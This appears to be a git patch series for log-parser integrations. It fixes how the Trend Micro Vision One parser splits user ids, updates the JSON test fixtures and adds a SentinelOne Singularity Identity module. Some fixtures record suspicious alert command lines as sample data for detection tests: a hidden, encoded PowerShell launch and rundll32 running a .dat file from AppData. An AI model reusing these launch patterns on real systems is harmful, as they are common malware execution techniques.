process.parent.command_line: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'parentCmd') | first).value }}" 
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json b/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json index e6bcf0088..769477b65 100644 --- a/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json +++ b/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json 
@@ -3,7 +3,7 @@ "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=7ddf32e17a6ac5ce04a8ecbf782ca509\", \"alertProvider\": \"SAE\", \"modelId\": \"fc93e58b-142a-46bd-89b3-0670004728da\", \"model\": \"Internal Network Scanner\", \"modelType\": \"preset\", \"score\": 22, \"severity\": \"low\", \"createdDateTime\": \"2024-07-23T14:46:11Z\", \"updatedDateTime\": \"2024-07-23T14:46:11Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"john\\\\doe\", \"entityId\": \"john\\\\doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"name\": \"doe10\", \"ips\": [\"1.2.3.4\"]}, \"entityId\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"relatedEntities\": [\"john\\\\doe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8], \"provenance\": [\"Sweeping\", \"Alert\"], \"managementScopeGroupId\": \"a008286d-c35c-4b85-85bb-6c744b27c2e7\"}]}, \"description\": \"Detects usage of network scanner to gather information\", \"matchedRules\": [{\"id\": \"1382c167-1c06-4312-89bd-2db0573a0a3e\", \"name\": \"Internal Network Scanning\", \"matchedFilters\": [{\"id\": \"95fa94aa-126d-40a1-92dd-e4427da20897\", \"name\": \"Internal Network Scanning via Famatech Scanner Tools\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", \"mitreTechniqueIds\": [\"T1046\"], \"matchedEvents\": [{\"uuid\": \"47028c1b-ba5b-45ec-98b0-2f62b8ee1665\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", \"type\": 
\"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"C:\\\\WINDOWS\\\\Explorer.EXE\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\\\" \", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"file_sha256\", \"field\": \"objectFileHashSha256\", \"value\": \"E665BB196B40DBB0FA91DBB908DB7DA5065BA28DF9F445AD97C17DF180FF43A1\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"B9AB76C0E991FED29CF07956B7B5E758DB91BEF52E4C0FA810FEF88000506631\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"objectFilePath\", \"value\": \"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"user_account\", \"field\": \"logonUser\", \"value\": \"doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], 
\"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Related Asset Enrichment\", \"Alert\"]}, {\"id\": 8, \"type\": \"user_account\", \"field\": \"\", \"value\": \"Syst\\u00e8me\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}]}" }, "expected": { - "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=0c12e642ca5b7ed4436e5f23f568ae10066608d3\", \"alertProvider\": \"SAE\", \"modelId\": \"fc93e58b-142a-46bd-89b3-0670004728da\", \"model\": \"Internal Network Scanner\", \"modelType\": \"preset\", \"score\": 22, \"severity\": \"low\", \"createdDateTime\": \"2024-07-23T14:46:11Z\", \"updatedDateTime\": \"2024-07-23T14:46:11Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"john\\\\doe\", \"entityId\": \"john\\\\doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"name\": \"doe10\", \"ips\": [\"1.2.3.4\"]}, \"entityId\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"relatedEntities\": [\"john\\\\doe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8], \"provenance\": [\"Sweeping\", \"Alert\"], \"managementScopeGroupId\": \"a008286d-c35c-4b85-85bb-6c744b27c2e7\"}]}, \"description\": \"Detects usage of network scanner to gather information\", \"matchedRules\": [{\"id\": \"1382c167-1c06-4312-89bd-2db0573a0a3e\", \"name\": \"Internal Network Scanning\", 
\"matchedFilters\": [{\"id\": \"95fa94aa-126d-40a1-92dd-e4427da20897\", \"name\": \"Internal Network Scanning via Famatech Scanner Tools\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", \"mitreTechniqueIds\": [\"T1046\"], \"matchedEvents\": [{\"uuid\": \"47028c1b-ba5b-45ec-98b0-2f62b8ee1665\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", \"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"C:\\\\WINDOWS\\\\Explorer.EXE\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\\\" \", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"file_sha256\", \"field\": \"objectFileHashSha256\", \"value\": \"E665BB196B40DBB0FA91DBB908DB7DA5065BA28DF9F445AD97C17DF180FF43A1\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"B9AB76C0E991FED29CF07956B7B5E758DB91BEF52E4C0FA810FEF88000506631\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"objectFilePath\", \"value\": 
\"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"user_account\", \"field\": \"logonUser\", \"value\": \"doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Related Asset Enrichment\", \"Alert\"]}, {\"id\": 8, \"type\": \"user_account\", \"field\": \"\", \"value\": \"Syst\\u00e8me\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}]}", + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=7ddf32e17a6ac5ce04a8ecbf782ca509\", \"alertProvider\": \"SAE\", \"modelId\": \"fc93e58b-142a-46bd-89b3-0670004728da\", \"model\": \"Internal Network Scanner\", \"modelType\": \"preset\", \"score\": 22, \"severity\": \"low\", \"createdDateTime\": \"2024-07-23T14:46:11Z\", \"updatedDateTime\": \"2024-07-23T14:46:11Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"john\\\\doe\", \"entityId\": \"john\\\\doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"name\": \"doe10\", \"ips\": [\"1.2.3.4\"]}, \"entityId\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"relatedEntities\": [\"john\\\\doe\"], 
\"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8], \"provenance\": [\"Sweeping\", \"Alert\"], \"managementScopeGroupId\": \"a008286d-c35c-4b85-85bb-6c744b27c2e7\"}]}, \"description\": \"Detects usage of network scanner to gather information\", \"matchedRules\": [{\"id\": \"1382c167-1c06-4312-89bd-2db0573a0a3e\", \"name\": \"Internal Network Scanning\", \"matchedFilters\": [{\"id\": \"95fa94aa-126d-40a1-92dd-e4427da20897\", \"name\": \"Internal Network Scanning via Famatech Scanner Tools\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", \"mitreTechniqueIds\": [\"T1046\"], \"matchedEvents\": [{\"uuid\": \"47028c1b-ba5b-45ec-98b0-2f62b8ee1665\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", \"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"C:\\\\WINDOWS\\\\Explorer.EXE\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\\\" \", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"file_sha256\", \"field\": \"objectFileHashSha256\", \"value\": \"E665BB196B40DBB0FA91DBB908DB7DA5065BA28DF9F445AD97C17DF180FF43A1\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"B9AB76C0E991FED29CF07956B7B5E758DB91BEF52E4C0FA810FEF88000506631\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": 
\"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"objectFilePath\", \"value\": \"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"user_account\", \"field\": \"logonUser\", \"value\": \"doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Related Asset Enrichment\", \"Alert\"]}, {\"id\": 8, \"type\": \"user_account\", \"field\": \"\", \"value\": \"Syst\\u00e8me\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}]}", "event": { "category": [ "intrusion_detection" @@ -33,10 +33,6 @@ "product": "Vision One", "vendor": "TrendMicro" }, - "organization": { - "id": "john\\doe", - "name": "john\\doe" - }, "process": { "command_line": "C:\\WINDOWS\\Explorer.EXE", "executable": "C:\\Windows\\explorer.exe", @@ -68,6 +64,8 @@ } }, "user": { + "domain": "doe", + "id": "john\\doe", "name": "doe" } } diff --git a/Trend Micro/trend-micro-vision-one/tests/test_process.json b/Trend Micro/trend-micro-vision-one/tests/test_process.json index d6ef4acd1..560c2ce13 100644 --- a/Trend Micro/trend-micro-vision-one/tests/test_process.json +++ b/Trend Micro/trend-micro-vision-one/tests/test_process.json 
@@ -33,10 +33,6 @@
 "product": "Vision One",
 "vendor": "TrendMicro"
 },
- "organization": {
- "id": "shockwave\\sam",
- "name": "shockwave\\sam"
- },
 "process": {
 "command_line": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe -nop -noni -w hidden -enc ......aakaakaekavgaracqaswapackafabjaeuawaa=",
 "executable": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe",
@@ -50,6 +46,9 @@
 ],
 "ip": [
 "10.10.58.51"
+ ],
+ "user": [
+ "shockwave"
 ]
 },
 "rule": {
@@ -62,6 +61,11 @@
 "severity": "high",
 "status": "Open"
 }
+ },
+ "user": {
+ "domain": "sam",
+ "id": "shockwave\\sam",
+ "name": "shockwave"
 }
 }
 }
\ No newline at end of file
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_registry.json b/Trend Micro/trend-micro-vision-one/tests/test_registry.json
index 3c32834ae..9159ec844 100644
--- a/Trend Micro/trend-micro-vision-one/tests/test_registry.json
+++ b/Trend Micro/trend-micro-vision-one/tests/test_registry.json
@@ -29,10 +29,6 @@
 "product": "Vision One",
 "vendor": "TrendMicro"
 },
- "organization": {
- "id": "shockwave\\sam",
- "name": "shockwave\\sam"
- },
 "process": {
 "command_line": "c:\\windows\\system32\\rundll32.exe c:\\users\\sam\\appdata\\local\\cyzfc.dat entrypoint",
 "parent": {
@@ -52,6 +48,9 @@
 "related": {
 "ip": [
 "10.10.58.51"
+ ],
+ "user": [
+ "shockwave"
 ]
 },
 "rule": {
@@ -68,7 +67,10 @@
 }
 },
 "user": {
- "email": "support@pctutordetroit.com"
+ "domain": "sam",
+ "email": "support@pctutordetroit.com",
+ "id": "shockwave\\sam",
+ "name": "shockwave"
 }
 }
 }
\ No newline at end of file
From e93cd918eba05ba91b7e501ccd72d2f4c383c05d Mon Sep 17 00:00:00 2001
From: lvoloshyn-sekoia <135212489+lvoloshyn-sekoia@users.noreply.github.com> Date: Tue, 26 Nov 2024 12:10:22 +0200 Subject: [PATCH 284/317] Update Trend Micro/trend-micro-vision-one/ingest/parser.yml MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Co-authored-by: Sébastien Quioc --- Trend Micro/trend-micro-vision-one/ingest/parser.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/Trend Micro/trend-micro-vision-one/ingest/parser.yml b/Trend Micro/trend-micro-vision-one/ingest/parser.yml index 3446a59f6..09ca7f331 100644 --- a/Trend Micro/trend-micro-vision-one/ingest/parser.yml +++ b/Trend Micro/trend-micro-vision-one/ingest/parser.yml @@ -41,8 +41,8 @@ stages: user.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'account') | first).entityValue }}" - set: - user.name: "{{final.user.id.split('\\\\')[0]}}" - user.domain: "{{final.user.id.split('\\\\')[1]}}" + user.name: "{{final.user.id.split('\\\\') | last}}" + user.domain: "{{final.user.id.split('\\\\') | first}}" filter: "{{final.user.id != null}}" - set: From 454ad36347fe76d2363d7652a1d1a89125f5f15c Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Tue, 26 Nov 2024 12:11:14 +0200 Subject: [PATCH 285/317] Fix tests --- .../tests/test_internal_network_scanner.json | 2 +- Trend Micro/trend-micro-vision-one/tests/test_process.json | 6 +++--- Trend Micro/trend-micro-vision-one/tests/test_registry.json | 6 +++--- 3 files changed, 7 insertions(+), 7 deletions(-) diff --git a/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json b/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json index 769477b65..b31951fe2 100644 --- a/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json +++ b/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json 
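Review bot: The rewritten `user.name`/`user.domain` lines assume `final.user.id` always holds a `DOMAIN\user` pair; for an account value without a backslash, `split('\\\\') | first` and `| last` both return the whole string, so `user.domain` is silently filled with the user name. The `filter` on the following line only guards against a missing id, so I would tighten it to require a separator and add a second stage that maps a separator-less id to `user.name` alone, leaving `user.domain` unset rather than publishing a wrong value. Indentation below is conventional; the hunk does not preserve the file's own.
```yaml
  - set:
      user.name: "{{final.user.id.split('\\\\') | last}}"
      user.domain: "{{final.user.id.split('\\\\') | first}}"
    filter: "{{final.user.id != null and '\\\\' in final.user.id}}"

  - set:
      user.name: "{{final.user.id}}"
    filter: "{{final.user.id != null and '\\\\' not in final.user.id}}"
```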
@@ -64,7 +64,7 @@
 }
 },
 "user": {
- "domain": "doe",
+ "domain": "john",
 "id": "john\\doe",
 "name": "doe"
 }
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_process.json b/Trend Micro/trend-micro-vision-one/tests/test_process.json
index 560c2ce13..9c013b1c0 100644
--- a/Trend Micro/trend-micro-vision-one/tests/test_process.json
+++ b/Trend Micro/trend-micro-vision-one/tests/test_process.json
@@ -48,7 +48,7 @@
 "10.10.58.51"
 ],
 "user": [
- "shockwave"
+ "sam"
 ]
 },
 "rule": {
@@ -63,9 +63,9 @@
 }
 },
 "user": {
- "domain": "sam",
+ "domain": "shockwave",
 "id": "shockwave\\sam",
- "name": "shockwave"
+ "name": "sam"
 }
 }
 }
\ No newline at end of file
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_registry.json b/Trend Micro/trend-micro-vision-one/tests/test_registry.json
index 9159ec844..83d7e99b5 100644
--- a/Trend Micro/trend-micro-vision-one/tests/test_registry.json
+++ b/Trend Micro/trend-micro-vision-one/tests/test_registry.json
@@ -50,7 +50,7 @@
 "10.10.58.51"
 ],
 "user": [
- "shockwave"
+ "sam"
 ]
 },
 "rule": {
@@ -67,10 +67,10 @@
 }
 },
 "user": {
- "domain": "sam",
+ "domain": "shockwave",
 "email": "support@pctutordetroit.com",
 "id": "shockwave\\sam",
- "name": "shockwave"
+ "name": "sam"
 }
 }
 }
\ No newline at end of file
From 0cc29cf19f55d2373a36d2a9d29729216df11881 Mon Sep 17 00:00:00 2001
From: vg-svitla Date: Wed, 27 Nov 2024 12:15:11 +0200 Subject: [PATCH 286/317] Feature: SentinelOne Singularity --- SentinelOne/identity/CHANGELOG.md | 8 +++ SentinelOne/identity/_meta/fields.yml | 39 ++++++++++ SentinelOne/identity/_meta/logo.png | Bin 0 -> 27937 bytes SentinelOne/identity/_meta/manifest.yml | 8 +++ .../identity/_meta/smart-descriptions.json | 46 ++++++++++++ SentinelOne/identity/ingest/parser.yml | 67 ++++++++++++++++++ SentinelOne/identity/tests/test_alert_1.json | 49 +++++++++++++ SentinelOne/identity/tests/test_alert_10.json | 34 +++++++++ SentinelOne/identity/tests/test_alert_11.json | 49 +++++++++++++ SentinelOne/identity/tests/test_alert_12.json | 49 +++++++++++++ SentinelOne/identity/tests/test_alert_13.json | 49 +++++++++++++ SentinelOne/identity/tests/test_alert_14.json | 49 +++++++++++++ SentinelOne/identity/tests/test_alert_15.json | 49 +++++++++++++ SentinelOne/identity/tests/test_alert_16.json | 49 +++++++++++++ SentinelOne/identity/tests/test_alert_2.json | 22 ++++++ SentinelOne/identity/tests/test_alert_3.json | 34 +++++++++ SentinelOne/identity/tests/test_alert_4.json | 34 +++++++++ SentinelOne/identity/tests/test_alert_5.json | 49 +++++++++++++ SentinelOne/identity/tests/test_alert_6.json | 49 +++++++++++++ SentinelOne/identity/tests/test_alert_7.json | 49 +++++++++++++ SentinelOne/identity/tests/test_alert_8.json | 34 +++++++++ SentinelOne/identity/tests/test_alert_9.json | 34 +++++++++ 22 files changed, 850 insertions(+) create mode 100644 SentinelOne/identity/CHANGELOG.md create mode 100644 SentinelOne/identity/_meta/fields.yml create mode 100644 SentinelOne/identity/_meta/logo.png create mode 100644 SentinelOne/identity/_meta/manifest.yml create mode 100644 SentinelOne/identity/_meta/smart-descriptions.json create mode 100644 SentinelOne/identity/ingest/parser.yml create mode 100644 SentinelOne/identity/tests/test_alert_1.json create mode 100644 SentinelOne/identity/tests/test_alert_10.json create mode 100644 
SentinelOne/identity/tests/test_alert_11.json create mode 100644 SentinelOne/identity/tests/test_alert_12.json create mode 100644 SentinelOne/identity/tests/test_alert_13.json create mode 100644 SentinelOne/identity/tests/test_alert_14.json create mode 100644 SentinelOne/identity/tests/test_alert_15.json create mode 100644 SentinelOne/identity/tests/test_alert_16.json create mode 100644 SentinelOne/identity/tests/test_alert_2.json create mode 100644 SentinelOne/identity/tests/test_alert_3.json create mode 100644 SentinelOne/identity/tests/test_alert_4.json create mode 100644 SentinelOne/identity/tests/test_alert_5.json create mode 100644 SentinelOne/identity/tests/test_alert_6.json create mode 100644 SentinelOne/identity/tests/test_alert_7.json create mode 100644 SentinelOne/identity/tests/test_alert_8.json create mode 100644 SentinelOne/identity/tests/test_alert_9.json diff --git a/SentinelOne/identity/CHANGELOG.md b/SentinelOne/identity/CHANGELOG.md new file mode 100644 index 000000000..11bddf32c --- /dev/null +++ b/SentinelOne/identity/CHANGELOG.md @@ -0,0 +1,8 @@ +# Changelog + +All notable changes to this project will be documented in this file. + +The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/), +and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html). + +## [Unreleased] diff --git a/SentinelOne/identity/_meta/fields.yml b/SentinelOne/identity/_meta/fields.yml new file mode 100644 index 000000000..36e8acf65 --- /dev/null +++ b/SentinelOne/identity/_meta/fields.yml 
@@ -0,0 +1,39 @@ +sentinelone.identity.attackSurfaces: + description: '' + name: sentinelone.identity.attackSurfaces + type: keyword + +sentinelone.identity.classification: + description: '' + name: sentinelone.identity.classification + type: keyword + +sentinelone.identity.confidenceLevel: + description: '' + name: sentinelone.identity.confidenceLevel + type: keyword + +sentinelone.identity.id: + description: '' + name: sentinelone.identity.id + type: keyword + +sentinelone.identity.name: + description: '' + name: sentinelone.identity.name + type: keyword + +sentinelone.identity.result: + description: '' + name: sentinelone.identity.result + type: keyword + +sentinelone.identity.status: + description: '' + name: sentinelone.identity.status + type: keyword + +sentinelone.identity.storyLineId: + description: '' + name: sentinelone.identity.storyLineId + type: keyword 
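Review bot: All eight new `sentinelone.identity.*` declarations carry `description: ''`, so the field catalogue generated from this file documents nothing about them; fill them in from what the fixtures show, e.g. `description: Classification of the alert reported by Singularity Identity (ENUMERATION, UNKNOWN, ...)` for `sentinelone.identity.classification` and `description: Identifier of the alert` for `sentinelone.identity.id`. `sentinelone.identity.attackSurfaces` is a list in every visible fixture (`["IDENTITY"]`) yet is declared `type: keyword`; confirm that is the intended declaration for a multi-valued field.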
diff --git a/SentinelOne/identity/_meta/logo.png b/SentinelOne/identity/_meta/logo.png new file mode 100644 index 0000000000000000000000000000000000000000..bad66643418120e4e1dbdc385258d64188b37661 GIT binary patch literal 27937 zcmeFXWl)>Z_bwWsNb%ss358Oe0!50JAO#AfkO0A*;!@m;1-C+Jp-`X{2<}$gU5a~g zhZ0;*`a3dn=YQ|FJ9FmDoOcF3ZgGG;YE^RN7<7HRNA3U{2%Z-h+?=KpR?NlHClmpQ5 zH+?bvZQ42`!z_bG+OU>N`)r*pD>z0#80RJzJB^xOlGMADcc$4xcy9iN>iwp~5!1Le zTk&qm?%~nR)%Kymdm-1S#R_r5Uc;^c(Eok@uLb^(wE!Gr#|;Z%ZSNg1dtsS#eh>0y z-fEpg>WOtdeBrExhp3bY0y;7IW6ir}Klt7qIo$0Bh5z~~SJt2UwQ(l~b8g$zvvhz*4SXpDgnZGl!$_7bTNX)7_7O!fWG8t#1f zZA*cRbk0?YR}W^^W8ATTJI za}5CoGjs!@5Z>LGGAwmA?uasAaF?Gh#t$25Y9Pew-#kH3o)2VUn&1gs)N-9KD9F^}4+mV-5E%2#dCg=H0H$oKYI3^RnQB zE{-|Fx zFn}iv@BB7dvQwI9Jko&!_Kgc)0on(z?yO7aHRJ5p_SEM_RoePMz=DSN^Yok&C+FUao{9HW!jv{&o1$Oy6_ z!O;O1c19@#pt7^}&!1sn1bXQt6*l|3WFi!BxKK#=;|4G_U+xXu>_lTo zqW)v(KK)cov|#|F6!nqYJi_`4_V6UtI@zZ@$tx~|^;u{)Rd5t(VE^218+_Pw?2Z{% z7LPyxe;P>G6CR&7@U_UUp?TV#HG9J>P+q7tqv@(U{E4$+38XZ6-KV4oFt=qO5;<3S zW3yqNe69hd!{j~~qx}>(kWETa_!??5(fa74+gI_eHX&d> zw1k;7@-d80nzU_;aBVesh_`6-@rA0KV%n}R-R+p}3rW($9oc;r6+ku&SlrndZhyDc zOW=-4tR-tQKdKtp@k_2>wT{0mQqY;rftGp{wj^&2MqtKbuLiX}F4rvGGwDEBe?ilP z=zCPS|7mZ+tS0Y=k7vR)+ea&rR8O=>2xBl~g`GOaaBmsTo9eBIo@QI14J#BF=0cuX ziS@}!OZ`0$*ZXo&>uOqfuns}tyY~qbqW}WA^WqV>$C{_3o;W@|L+ppO?pV7i z3>uuGp4L#pR(McT*-TP$Kn#@ogXcPzq#c@p2rH3n441KnQt9@{n+4_+IZ{22siy47 ztg5Zz59~k8h!i%-FTAEwn3}3Ycv!PxXk^eb6W92^;P5}53t|KbVJ)1yN3!CW5rQAV zP{0(}y7?1fntq4Qu(f9`4-&qOuvG@&8StNdSH;r&uU{smDXkYK(b2fEV5K{nQ}ToO 